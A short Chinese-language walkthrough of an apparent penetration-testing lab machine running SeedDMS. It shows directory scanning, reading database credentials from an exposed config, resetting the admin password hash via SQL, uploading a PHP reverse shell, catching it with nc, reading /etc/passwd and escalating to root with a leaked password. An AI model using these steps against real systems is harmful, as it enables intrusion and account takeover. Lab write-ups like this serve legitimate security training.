一、信息收集
主机发现
对开放端口进行探测 80、3306、33060
访问80端口
目录扫描发现/js,对/js再扫描,发现信息泄露,使用seeddms
searchsploit是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。
目录扫描
python3 dirsearch.py -u http://192.168.9.11/seeddms51x/seeddms-5.1.22/
发现登陆点
二、漏洞利用
经过搜索发现seeddms 系统的配置目录中有可利用信息,看能不能找到 /conf 目录
/seeddms51x/conf 查看默认配置文件
进行数据库连接
mysql -h 192.168.226.133 -D seeddms -u seeddms -p seeddms
由于admin密码是加密的,并且md5解不出来,尝试修改密码为123456
UPDATE tblUsers SET pwd=‘e10adc3949ba59abbe56e057f20f883e’ WHERE login=‘admin’;
上传shell shell内容是 https://www.revshells.com/ 中的 php pentestmonkey
shell地址:example.com/data/1048576
/“document_id”/1.php (会自动将上传的文件重命名为1.php)
三、提权
nc监听,写入交互式 shell
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
发现一个 saket 用户,查看 /etc/passwd
密码:Saket@#$1337
查看权限可以访问所有内容,切换为 root